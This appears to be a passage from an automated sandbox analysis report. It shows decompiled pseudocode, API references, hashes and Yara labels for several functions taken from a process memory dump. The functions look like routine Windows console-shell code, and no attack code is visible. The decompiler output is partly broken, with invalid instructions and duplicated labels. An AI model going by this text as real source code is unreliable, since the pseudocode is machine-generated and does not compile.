				intOrPtr* _t53;
				signed int _t55;
				intOrPtr _t56;
				int _t59;
				int _t64;
				intOrPtr _t67;
				signed int _t71;
				signed int _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				char* _t83;
				signed int _t86;
				int _t88;
				void* _t90;
				intOrPtr _t92;
				void* _t94;
				void* _t96;
				void* _t98;
				intOrPtr _t101;
				void* _t103;
				char* _t105;
				void* _t108;
				signed int _t109;
				int _t112;
				void* _t113;
				signed int* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				signed int _t131;

				_t94 = __ecx;
				do {
				} while (E4A73727F(__eflags, 0) == 0);
				exit(_a4);
				asm("int3");
				_t117 = _t120;
				_t121 = _t120 - 0x28;
				_v28 = 0;
				_t40 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				 *0x4a75418c = _t40;
				E4A731690();
				__imp__HeapSetInformation(0, 1, 0, 0, 0, __edi, __esi, _t90, _t116);
				E4A737B0D(_t94,  &_v32);
				_t44 =  &_v13;
				_push(0x4a754210);
				_push(_t44);
				 *0x4a754086 = 1;
				 *0x4a7541d8 = _t44;
				if(E4A737D20() == 1) {
					 *0x4a754086 = 0;
				}
				E4A737BDB();
				_t105 =  &_v48;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0;
				_t49 = E4A7384E3( &_v48, 4);
				_t112 = _t49;
				if(_v28 == 1) {
					_push(0);
					E4A7399E1(_t94);
					_t96 = 0x40002729;
					_push(0);
					E4A74BE8D();
					_push(0xff);
					_t49 = E4A7372E9(_t96, _t105, _t112, __eflags);
				}
				_t113 = GetCPInfo;
				if(_t112 != 0) {
					_push(0);
					L4A731BC7();
					_t103 = 0x4a754b40;
					if(_t49 != 0) {
						_v24 = 1;
						__eflags =  *0x4a7540e4; // 0x0
						if(__eflags != 0) {
							_v20 = 0xff;
						}
					}
					if(_v24 == 0) {
						_v16 = 0;
						do {
							_t82 =  *((intOrPtr*)(_t117 + _v16 * 4 - 0x28));
							if( *((intOrPtr*)(_t117 + _v16 * 4 - 0x28)) != 0) {
								_t83 = E4A731BD2(__eflags, 1, _t82,  *0x4a754104);
								_t105 = _t83;
								__eflags = _t105 - 1;
								if(__eflags == 0) {
									_push(_t83);
									E4A7372E9(_t103, _t105, _t113, __eflags);
								}
								__eflags = _t105 - 0xffffffff;
								if(__eflags == 0) {
									_push(0);
									E4A7372E9(_t103, _t105, _t113, __eflags);
								}
								_t86 = E4A731492(0, _t105);
								__eflags = _t86;
								if(__eflags != 0) {
									_v20 = _t86;
								}
							}
							_v16 = _v16 + 1;
						} while (_v16 < 3);
						E4A731605();
						_t88 = GetConsoleOutputCP();
						 *0x4a7541b8 = _t88;
						GetCPInfo(_t88, 0x4a754260);
						_push(0);
						_t49 = E4A731690();
					}
					_t131 =  *0x4a7540e4; // 0x0
					if(_t131 != 0) {
						_push(_v20);
						_t49 = E4A7372E9(_t103, _t105, _t113, _t131);
					}
					 *0x4a7540e0 = 0;
				}
				_push(0);
				L4A731BC7();
				_t98 = 0x4a754b40;
				_v20 = _t49;
				if(_t49 == 0) {
					L16:
					if(_v28 == 2) {
						_push(0);
						E4A7399E1(_t98);
						_t98 = 0x40002729;
						_push(0);
						_t53 = E4A74BE8D();
						_push(0xff);
						L47:
						 *_t53 =  *_t53 + _t53;
						_t49 = _t53 + _t98 + 1;
						asm("cld");
						asm("invalid");
					}
					_t55 = E4A733B03(_t49, _t98, 0);
					asm("sbb edi, edi");
					_t108 =  ~_t55 + 3;
					_t134 = _t108 - 3;
					if(_t108 == 3) {
						__imp___setmode(0, 0x8000);
						_pop(_t98);
					}
					_t56 = E4A73C2F7(_t98, 0);
					while(1) {
						L19:
						 *0x4a7540b8 = 0;
						E4A731E6C(_t56);
						_t56 = E4A731BD2(_t134, _t108, 0, 0);
						_v32 = _t56;
						if(_t56 == 1) {
							continue;
						}
						L49:
						_t136 = _t56 - 0xffffffff;
						if(_t56 != 0xffffffff) {
							E4A731E6C(_t56);
							_t59 = GetConsoleOutputCP();
							 *0x4a7541b8 = _t59;
							GetCPInfo(_t59, 0x4a754260);
							_push(0);
							E4A731690();
							E4A731492(0, _v32);
							 *0x4a754083 = 0;
							E4A731605();
							_t64 = GetConsoleOutputCP();
							 *0x4a7541b8 = _t64;
							GetCPInfo(_t64, 0x4a754260);
							_push(0);
							_t56 = E4A731690();
							do {
								goto L19;
							} while (_t56 == 1);
							goto L49;
						}
						_push(0);
						_t53 = E4A7372E9(_t98, _t108, _t113, _t136);
						goto L47;
						L19:
						 *0x4a7540b8 = 0;
						E4A731E6C(_t56);
						_t56 = E4A731BD2(_t134, _t108, 0, 0);
						_v32 = _t56;
					}
				}
				__eflags = _t49 - 2;
				if(__eflags != 0) {
					goto L16;
				}
				E4A7372E9(_t98, _t105, _t113, __eflags);
				asm("int3");
				_t118 = _t121;
				L28();
				__imp__longjmp(0x4a754b40,  *((intOrPtr*)(_t118 + 8)), _t117, 0);
				asm("int3");
				_push(_t118);
				_push(_t98);
				_push(0);
				_t92 = 0;
				 *0x4a754120 = 0;
				__eflags =  *0x4a7540b4 - _t92; // 0x0
				if(__eflags != 0) {
					_push(0);
					L4A736BA1();
					_t67 =  *0x4a7541e0; // 0x0
					_push(0);
					 *0x4a75408c = _t67;
					 *0x4a7540b8 = 0;
					E4A73DA73();
					 *0x4a7540b4 = 0;
				}
				__eflags =  *0x4a7540cc - _t92; // 0x0
				if(__eflags == 0) {
					_t79 =  *0x4a7540bc; // 0x0
					 *0x4a7540c4 = _t79;
					_t80 =  *0x4a7540c0; // 0x0
					 *0x4a7540c8 = _t80;
					 *0x4a7540cc = 1;
				}
				 *0x4a7540bc = _t92;
				 *0x4a7540c0 = _t92;
				while(1) {
					__eflags =  *0x4a7540fc - _t92; // 0x0
					if(__eflags == 0) {
						break;
					}
					E4A734738();
				}
				_push(_t113);
				_push(_t105);
				E4A74383B(_t98);
				_t109 = 0;
				__eflags = 0;
				do {
					_t114 = 0x4a75487c + _t109 * 4;
					__eflags =  *_t114 - _t92;
					if( *_t114 != _t92) {
						_v20 = 1;
						do {
							_t71 = _v20;
							__eflags =  *_t114 & _t71;
							if(( *_t114 & _t71) != 0) {
								__eflags = _t109;
								if(_t109 != 0) {
									L58:
									__eflags = (_t109 << 5) + _t92;
									E4A733AB3((_t109 << 5) + _t92);
								} else {
									__eflags = _t92 - 2;
									if(_t92 > 2) {
										goto L58;
									}
								}
							}
							_v20 = _v20 << 1;
							_t92 = _t92 + 1;
							__eflags = _t92 - 0x20;
						} while (_t92 < 0x20);
						_t92 = 0;
					}
					_t109 = _t109 + 1;
					__eflags = _t109 - 3;
				} while (_t109 < 3);
				while(1) {
					_t72 =  *0x4a754134; // 0x0
					__eflags = _t72 - _t92;
					if(_t72 == _t92) {
						break;
					}
					_t101 =  *0x4a75412c; // 0x0
					E4A732F5C( *((intOrPtr*)(_t101 + _t72 * 4 - 4)));
				}
				return E4A731605();
			}

0x4a7372e9
0x4a7372ee
0x4a7372f5
0x4a7372fc
0x4a737302
0x4a73730b
0x4a73730d
0x4a737315
0x4a737325
0x4a73732c
0x4a737331
0x4a73733b
0x4a737345
0x4a73734a
0x4a73734d
0x4a737352
0x4a737353
0x4a73735a
0x4a737367
0x4a74762a
0x4a74762a
0x4a73736d
0x4a737374
0x4a737377
0x4a737378
0x4a737379
0x4a73737a
0x4a737381
0x4a737384
0x4a73738d
0x4a73738f
0x4a747635
0x4a74763b
0x4a747641
0x4a747642
0x4a747643
0x4a747648
0x4a74764d
0x4a74764d
0x4a737397
0x4a73739d
0x4a73739f
0x4a7373a5
0x4a7373ab
0x4a7373ae
0x4a747657
0x4a74765e
0x4a747664
0x4a74766a
0x4a74766a
0x4a747664
0x4a7373b7
0x4a7373b9
0x4a7373bc
0x4a7373bf
0x4a7373c5
0x4a737469
0x4a73746e
0x4a737470
0x4a737473
0x4a747676
0x4a747677
0x4a747677
0x4a737479
0x4a73747c
0x4a747681
0x4a747682
0x4a747682
0x4a737484
0x4a737489
0x4a73748b
0x4a737491
0x4a737491
0x4a73748b
0x4a7373cb
0x4a7373ce
0x4a7373d4
0x4a7373d9
0x4a7373e5
0x4a7373ea
0x4a7373ec
0x4a7373ed
0x4a7373ed
0x4a7373f2
0x4a7373f8
0x4a7373fa
0x4a7373fd
0x4a7373fd
0x4a737402
0x4a737402
0x4a737408
0x4a73740e
0x4a737414
0x4a737415
0x4a73741a
0x4a737420
0x4a737424
0x4a74768c
0x4a747692
0x4a747698
0x4a747699
0x4a74769a
0x4a74769f
0x4a7476a1
0x4a7476a1
0x4a7476a5
0x4a7476a6
0x4a7476a7
0x4a7476a7
0x4a73742b
0x4a737434
0x4a737436
0x4a737439
0x4a73743c
0x4a743621
0x4a743628
0x4a743628
0x4a737443
0x4a737448
0x4a737448
0x4a737448
0x4a73744e
0x4a737456
0x4a7476ae
0x4a7476b4
0x00000000
0x00000000
0x4a7476ba
0x4a7476ba
0x4a7476bd
0x4a7476c9
0x4a7476ce
0x4a7476da
0x4a7476df
0x4a7476e1
0x4a7476e2
0x4a7476eb
0x4a7476f0
0x4a7476f6
0x4a7476fb
0x4a747707
0x4a74770c
0x4a74770e
0x4a74770f
0x4a737448
0x00000000
0x00000000
0x00000000
0x4a737448
0x4a7476bf
0x4a7476c0
0x00000000
0x4a737448
0x4a737448
0x4a73744e
0x4a737456
0x4a7476ae
0x4a7476b1
0x4a737448
0x4a743772
0x4a743775
0x00000000
0x00000000
0x4a74377c
0x4a743781
0x4a74378a
0x4a74378c
0x4a743799
0x4a74379f
0x4a7437a7
0x4a7437aa
0x4a7437ab
0x4a7437ac
0x4a7437ae
0x4a7437b4
0x4a7437ba
0x4a749547
0x4a749548
0x4a74954d
0x4a749552
0x4a749553
0x4a749558
0x4a74955e
0x4a749563
0x4a749563
0x4a7437c0
0x4a7437c6
0x4a7437c8
0x4a7437cd
0x4a7437d2
0x4a7437d7
0x4a7437dc
0x4a7437dc
0x4a7437e6
0x4a7437ec
0x4a7437f2
0x4a7437f2
0x4a7437f8
0x00000000
0x00000000
0x4a74382f
0x4a74382f
0x4a7437fa
0x4a7437fb
0x4a7437fc
0x4a743801
0x4a743801
0x4a743803
0x4a743803
0x4a74380a
0x4a74380c
0x4a74956e
0x4a749575
0x4a749575
0x4a749578
0x4a74957a
0x4a74957c
0x4a74957e
0x4a749585
0x4a74958a
0x4a74958d
0x4a749580
0x4a749580
0x4a749583
0x00000000
0x00000000
0x4a749583
0x4a74957e
0x4a749592
0x4a749595
0x4a749596
0x4a749596
0x4a74959b
0x4a74959b
0x4a743812
0x4a743813
0x4a743813
0x4a74381a
0x4a74381a
0x4a74381f
0x4a743821
0x00000000
0x00000000
0x4a7495a2
0x4a7495ac
0x4a7495ac
0x4a74382e

APIs

exit.MSVCRT ref: 4A7372FC
GetCurrentThreadId.KERNEL32(00000000,00000000,00000000), ref: 4A737318
OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 4A737325
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 4A73733B
_setjmp3.MSVCRT ref: 4A7373A5
GetConsoleOutputCP.KERNEL32 ref: 4A7373D9
GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7373EA
_setjmp3.MSVCRT ref: 4A73740E

Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17

_setmode.MSVCRT ref: 4A743621

Part of subcall function 4A73C2F7: SetConsoleTitleW.KERNEL32(?), ref: 4A73C3E1
Part of subcall function 4A73C2F7: LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,74EC5129,00000000), ref: 4A73C420

Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85

Part of subcall function 4A731BD2: _setjmp3.MSVCRT ref: 4A731BFB

GetConsoleOutputCP.KERNEL32 ref: 4A7476CE
GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7476DF
GetConsoleOutputCP.KERNEL32 ref: 4A7476FB
GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A74770C

Strings

hRtJ:#, xrefs: 4A7372EB

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$InfoOutput_setjmp3$CriticalSectionThread$CurrentEnterFileFreeHeapInformationLeaveLocalOpenTitleType_get_osfhandle_setmodeexit
String ID: hRtJ:#
API String ID: 2992786541-153624809
Opcode ID: 4cd7f0441372827eaa0c331159f999d4e6ffb4060c61b9ebd058cc19c4ab3549
Instruction ID: aa11f926371b94ab5968d6aadbd5edad1155b12f4fe5bf8c49bba846a9ed4633
Opcode Fuzzy Hash: 4cd7f0441372827eaa0c331159f999d4e6ffb4060c61b9ebd058cc19c4ab3549
Instruction Fuzzy Hash: 5051F5F184DA5ABADB70DBB4CC8999E3FBDDB05250F134416E115EA843DB34984CCB2A

Uniqueness

Uniqueness Score: -1.00%

Function 4A7398A5, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 151
windowCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E4A7398A5(signed int __edx, long _a4, char* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v40;
				short _v104;
				signed int _v108;
				intOrPtr* _v112;
				void* _v116;
				char* _v120;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t43;
				WCHAR* _t50;
				void* _t54;
				signed short* _t56;
				signed int _t58;
				va_list* _t61;
				signed int _t68;
				char* _t69;
				intOrPtr* _t70;
				signed int _t72;
				void* _t73;
				WCHAR* _t74;
				signed int _t75;

				_t72 = __edx;
				_t36 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t36 ^ _t75;
				_t73 = FormatMessageW;
				_v112 = _a16;
				_t74 = 0x4a764640;
				if(_a4 == 0x13d || FormatMessageW(0x1a00, 0, _a4, 0, 0x4a764640, 0x2000, 0) == 0) {
					__imp___ultoa(_a4,  &_v40, 0x10);
					_t43 = E4A734B8D(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t43),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v124 =  &_v104;
					_v120 = L"Application";
					if(_a4 < 0x2328) {
						_v120 = L"System";
					}
					_push( &_v124);
					_push(0x2000);
					_push(_t74);
					_push(0);
					_push(0x13d);
					_push(0);
					_push(0x3000);
					goto L9;
				} else {
					_v108 = _v108 & 0x00000000;
					_t54 = E4A7318EB(0x4a764640, 0x25);
					if(_t54 == 0) {
						L8:
						_push(_v112);
						_push(0x2000);
						_push(_t74);
						_push(0);
						_push(_a4);
						_push(0);
						_push(0x1800);
						L9:
						_t74 = FormatMessageW();
						L10:
						_t50 = _t74;
						L11:
						return E4A7313A9(_t50, 0x2000, _v8 ^ _t75, _t72, _t73, _t74);
					} else {
						goto L3;
					}
					do {
						L3:
						_t56 = _t54 + 2;
						_t68 =  *_t56 & 0x0000ffff;
						if(_t68 < 0x31 || _t68 > 0x39) {
							if(_t68 == 0x25) {
								_t56 =  &(_t56[1]);
							}
						} else {
							_v108 = _v108 + 1;
						}
						_t54 = E4A7318EB(_t56, 0x25);
					} while (_t54 != 0);
					_t58 = _v108;
					if(_t58 > _a12) {
						_t61 = HeapAlloc(GetProcessHeap(), 0, _t58 << 2);
						_t72 = 0;
						_v116 = _t61;
						if(_t61 != 0) {
							if(_v108 <= 0) {
								L25:
								_t74 = FormatMessageW(0x3800, 0, _a4, 0, _t74, 0x2000, _t61);
								HeapFree(GetProcessHeap(), 0, _v116);
								goto L10;
							} else {
								goto L21;
							}
							do {
								L21:
								if(_t72 >= _a12) {
									_t69 = _a8;
								} else {
									_t70 = _v112;
									 *_t70 =  *_t70 + 4;
									_t69 =  *( *_t70 - 4);
								}
								_t61[_t72] = _t69;
								_t72 = _t72 + 1;
							} while (_t72 < _v108);
							goto L25;
						}
						_t50 = 0;
						goto L11;
					}
					goto L8;
				}
			}

0x4a7398a5
0x4a7398ad
0x4a7398b4
0x4a7398c4
0x4a7398ca
0x4a7398d2
0x4a7398d7
0x4a749840
0x4a74985c
0x4a749863
0x4a74986a
0x4a74987a
0x4a74987d
0x4a749884
0x4a749886
0x4a749886
0x4a749890
0x4a749891
0x4a749892
0x4a749893
0x4a749895
0x4a74989a
0x4a74989c
0x00000000
0x4a7398f6
0x4a7398f6
0x4a7398fd
0x4a739904
0x4a739932
0x4a739932
0x4a739935
0x4a739936
0x4a739937
0x4a739939
0x4a73993c
0x4a73993e
0x4a739943
0x4a739945
0x4a739947
0x4a739947
0x4a739949
0x4a739957
0x00000000
0x00000000
0x00000000
0x4a739906
0x4a739906
0x4a739907
0x4a739908
0x4a73990f
0x4a73995e
0x4a7498a7
0x4a7498a7
0x4a739917
0x4a739917
0x4a739917
0x4a73991d
0x4a739922
0x4a739926
0x4a73992c
0x4a7498ba
0x4a7498c0
0x4a7498c2
0x4a7498c7
0x4a7498d3
0x4a7498f3
0x4a749907
0x4a749912
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7498d5
0x4a7498d5
0x4a7498d8
0x4a7498e7
0x4a7498da
0x4a7498da
0x4a7498dd
0x4a7498e2
0x4a7498e2
0x4a7498ea
0x4a7498ed
0x4a7498ee
0x00000000
0x4a7498d5
0x4a7498c9
0x00000000
0x4a7498c9
0x00000000
0x4a73992c

APIs

FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A764640,00002000,00000000,00000000,74EC14B9,00000000), ref: 4A7398EC

Part of subcall function 4A7318EB: wcschr.MSVCRT ref: 4A731900

FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A764640,00002000,?,4A764640,00000025), ref: 4A739943
_ultoa.MSVCRT ref: 4A749840
GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A749855
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A74986A

Strings

@FvJ, xrefs: 4A7398D2
hRtJ:#, xrefs: 4A7398A7
System, xrefs: 4A749886
Application, xrefs: 4A74987D

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: @FvJ$Application$System$hRtJ:#
API String ID: 3538039442-140189394
Opcode ID: e58e512da0ae7e83d8a5d34d5c4180b4440bb595789d948938549675a8326f06
Instruction ID: b8bd13090a7df968a3c01c4d1aed2db2cdc6608c96c3452c87ce21b5fa06b16d
Opcode Fuzzy Hash: e58e512da0ae7e83d8a5d34d5c4180b4440bb595789d948938549675a8326f06
Instruction Fuzzy Hash: FB415D71A49209AFEB70DEA4CC49FEE7BBCEB45792F224115F506DB182D6709D48CB20

Uniqueness

Uniqueness Score: -1.00%

Function 4A74CB35, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E4A74CB35(void* __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v2056;
				char _v2057;
				char _v2058;
				wchar_t* _v2064;
				signed int _v2068;
				wchar_t* _v2072;
				long _v2076;
				void* _v2080;
				void* _v2084;
				long _v2088;
				void* __ebx;
				signed int _t45;
				void* _t48;
				signed int _t50;
				wchar_t* _t51;
				short* _t53;
				void* _t56;
				void* _t58;
				signed int _t59;
				void* _t60;
				signed int _t61;
				signed int _t67;
				signed int _t68;
				short* _t72;
				long _t75;
				long _t78;
				wchar_t* _t81;
				wchar_t* _t82;
				wchar_t* _t83;
				signed int _t84;
				short _t87;
				signed short* _t88;
				signed int _t98;
				void* _t106;
				long _t108;
				signed int _t113;

				_t110 = __esi;
				_t107 = __edi;
				_t106 = __edx;
				_t45 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t45 ^ _t113;
				_t2 =  &_a4; // 0x4a745473
				_v2058 = 0;
				_v2057 = 0;
				_t48 = E4A7319D6( *_t2);
				_t87 = 0;
				if(_t48 != 0) {
					_t88 = E4A732D9B(_t48);
					_t50 =  *_t88 & 0x0000ffff;
					_v2072 = _t88;
					__eflags = _t50;
					if(_t50 != 0) {
						_push(__esi);
						_push(__edi);
						_t108 = 0x22;
						__eflags = _t50 - _t108;
						if(_t50 == _t108) {
							_t83 = E4A732D9B( &(_t88[1]));
							_v2072 = _t83;
							_t84 = wcsrchr(_t83, _t108);
							__eflags = _t84;
							if(_t84 != 0) {
								__eflags = 0;
								 *_t84 = 0;
							}
						}
						_t51 = wcschr(_v2072, 0x3d);
						_pop(_t90);
						__eflags = _t51 - _t87;
						if(_t51 != _t87) {
							_t90 = 0;
							 *_t51 = 0;
							_t53 = E4A732D9B( &(_t51[0]));
							_v2064 = _t53;
							__eflags =  *_t53 - _t108;
							if( *_t53 == _t108) {
								_t81 = E4A732D9B(_t53 + 2);
								_v2064 = _t81;
								_t82 = wcsrchr(_t81, _t108);
								_pop(_t90);
								__eflags = _t82 - _t87;
								if(_t82 != _t87) {
									_t90 = 0;
									__eflags = 0;
									 *_t82 = 0;
								}
								_t53 = _v2064;
							}
							__eflags =  *_t53 - 0x3d;
							if( *_t53 == 0x3d) {
								goto L8;
							} else {
								_t58 = GetStdHandle(0xfffffff5);
								_v2084 = _t58;
								_t59 = GetConsoleMode(_t58,  &_v2088);
								_t87 = SetConsoleMode;
								__eflags = _t59;
								if(_t59 != 0) {
									_t78 = _v2088 | 0x00000001;
									__eflags = _t78;
									_v2058 = 1;
									SetConsoleMode(_v2084, _t78);
								}
								_t60 = GetStdHandle(0xfffffff6);
								_t96 =  &_v2076;
								_v2080 = _t60;
								_t61 = GetConsoleMode(_t60,  &_v2076);
								__eflags = _t61;
								if(_t61 != 0) {
									_t75 = _v2076 | 0x00000007;
									__eflags = _t75;
									_v2057 = 1;
									SetConsoleMode(_v2080, _t75);
								}
								E4A7399E1(_t96, 0x2371, 1, _v2064);
								_v2056 = 0;
								_push( &_v2068);
								_push(0x3ff);
								_t67 = E4A7367D3(GetStdHandle(0xfffffff6),  &_v2056);
								__eflags = _t67;
								if(_t67 == 0) {
									L28:
									_t31 =  &_v2068;
									 *_t31 = _v2068 & 0x00000000;
									__eflags =  *_t31;
								} else {
									_t98 = _v2068;
									__eflags = _t98;
									if(__eflags == 0) {
										goto L28;
									}
									if(__eflags <= 0) {
										L29:
										__eflags = _v2058;
										if(_v2058 != 0) {
											SetConsoleMode(_v2084, _v2088);
										}
										__eflags = _v2057;
										if(_v2057 != 0) {
											SetConsoleMode(_v2080, _v2076);
										}
										_t68 = _v2068;
										__eflags = _t68;
										if(_t68 == 0) {
											goto L9;
										} else {
											 *((short*)(_t113 + _t68 * 2 - 0x804)) = 0;
											_t56 = E4A731730(_v2072,  &_v2056);
											goto L10;
										}
									}
									_t72 = _t113 + _t98 * 2 - 0x806;
									while(1) {
										__eflags =  *_t72 - 0x20;
										if( *_t72 >= 0x20) {
											goto L29;
										}
										_t98 = _t98 - 1;
										_t72 = _t72;
										_v2068 = _t98;
										__eflags = _t98;
										if(_t98 <= 0) {
											goto L29;
										}
									}
								}
								goto L29;
							}
						} else {
							L8:
							_push(_t87);
							_push(0x232a);
							E4A736D44(_t90);
							L9:
							_t56 = 1;
							__eflags = 1;
							L10:
							_pop(_t107);
							_pop(_t110);
							L11:
							return E4A7313A9(_t56, _t87, _v8 ^ _t113, _t106, _t107, _t110);
						}
					}
					_push(0);
					_push(0x232a);
					E4A736D44(_t88);
				}
				_t56 = 1;
				goto L11;
			}

0x4a74cb35
0x4a74cb35
0x4a74cb35
0x4a74cb40
0x4a74cb47
0x4a74cb4a
0x4a74cb4f
0x4a74cb56
0x4a74cb5d
0x4a74cb62
0x4a74cb66
0x4a74cb73
0x4a74cb75
0x4a74cb78
0x4a74cb7e
0x4a74cb81
0x4a74cb92
0x4a74cb99
0x4a74cb9c
0x4a74cb9d
0x4a74cba0
0x4a74cba6
0x4a74cbad
0x4a74cbb3
0x4a74cbb7
0x4a74cbb9
0x4a74cbbb
0x4a74cbbd
0x4a74cbbd
0x4a74cbb9
0x4a74cbc8
0x4a74cbcf
0x4a74cbd0
0x4a74cbd2
0x4a74cbf5
0x4a74cbf7
0x4a74cbfe
0x4a74cc03
0x4a74cc09
0x4a74cc0c
0x4a74cc12
0x4a74cc19
0x4a74cc1f
0x4a74cc22
0x4a74cc23
0x4a74cc25
0x4a74cc27
0x4a74cc27
0x4a74cc29
0x4a74cc29
0x4a74cc2c
0x4a74cc2c
0x4a74cc32
0x4a74cc36
0x00000000
0x4a74cc38
0x4a74cc40
0x4a74cc50
0x4a74cc56
0x4a74cc58
0x4a74cc5e
0x4a74cc60
0x4a74cc68
0x4a74cc68
0x4a74cc72
0x4a74cc79
0x4a74cc79
0x4a74cc7d
0x4a74cc7f
0x4a74cc87
0x4a74cc8d
0x4a74cc8f
0x4a74cc91
0x4a74cc99
0x4a74cc99
0x4a74cca3
0x4a74ccaa
0x4a74ccaa
0x4a74ccb9
0x4a74ccc3
0x4a74ccd0
0x4a74ccd1
0x4a74cce2
0x4a74cce7
0x4a74cce9
0x4a74cd13
0x4a74cd13
0x4a74cd13
0x4a74cd13
0x4a74cceb
0x4a74cceb
0x4a74ccf1
0x4a74ccf3
0x00000000
0x00000000
0x4a74ccf5
0x4a74cd1a
0x4a74cd1a
0x4a74cd21
0x4a74cd2f
0x4a74cd2f
0x4a74cd31
0x4a74cd38
0x4a74cd46
0x4a74cd46
0x4a74cd48
0x4a74cd4e
0x4a74cd50
0x00000000
0x4a74cd56
0x4a74cd58
0x4a74cd6d
0x00000000
0x4a74cd6d
0x4a74cd50
0x4a74ccf7
0x4a74ccfe
0x4a74ccfe
0x4a74cd02
0x00000000
0x00000000
0x4a74cd04
0x4a74cd06
0x4a74cd07
0x4a74cd0d
0x4a74cd0f
0x00000000
0x00000000
0x4a74cd11
0x4a74ccfe
0x00000000
0x4a74cce9
0x4a74cbd4
0x4a74cbd4
0x4a74cbd4
0x4a74cbd5
0x4a74cbda
0x4a74cbe1
0x4a74cbe3
0x4a74cbe3
0x4a74cbe4
0x4a74cbe4
0x4a74cbe5
0x4a74cbe6
0x4a74cbf2
0x4a74cbf2
0x4a74cbd2
0x4a74cb83
0x4a74cb84
0x4a74cb89
0x4a74cb8f
0x4a74cb6a
0x00000000

APIs

wcsrchr.MSVCRT ref: 4A74CBB3
wcschr.MSVCRT ref: 4A74CBC8
wcsrchr.MSVCRT ref: 4A74CC1F
GetStdHandle.KERNEL32(000000F5,-00000002), ref: 4A74CC40
GetConsoleMode.KERNEL32 ref: 4A74CC56
SetConsoleMode.KERNEL32 ref: 4A74CC79
GetStdHandle.KERNEL32(000000F6), ref: 4A74CC7D
GetConsoleMode.KERNEL32 ref: 4A74CC8D
SetConsoleMode.KERNEL32 ref: 4A74CCAA
GetStdHandle.KERNEL32(000000F6,?,000003FF,?), ref: 4A74CCDF

Part of subcall function 4A732D9B: iswspace.MSVCRT ref: 4A732DAD

SetConsoleMode.KERNEL32 ref: 4A74CD2F
SetConsoleMode.KERNEL32 ref: 4A74CD46

Strings

sTtJ, xrefs: 4A74CB4A, 4A74CB4E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
String ID: sTtJ
API String ID: 4166807220-3995157118
Opcode ID: 8e42eab27b8da6d5ed8fba8d097483fa17002930f84d70a4a5ed615512e3e015
Instruction ID: c89c119d576b8bc1ca81510251be1a4fcf2c2aec3c4244d9895d658b5e2b32fd
Opcode Fuzzy Hash: 8e42eab27b8da6d5ed8fba8d097483fa17002930f84d70a4a5ed615512e3e015
Instruction Fuzzy Hash: 3451B0729182289ADF709B64CC45B9A7FF8FF04350F11C5E9E189E6191DE708E89CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02378788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02378788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
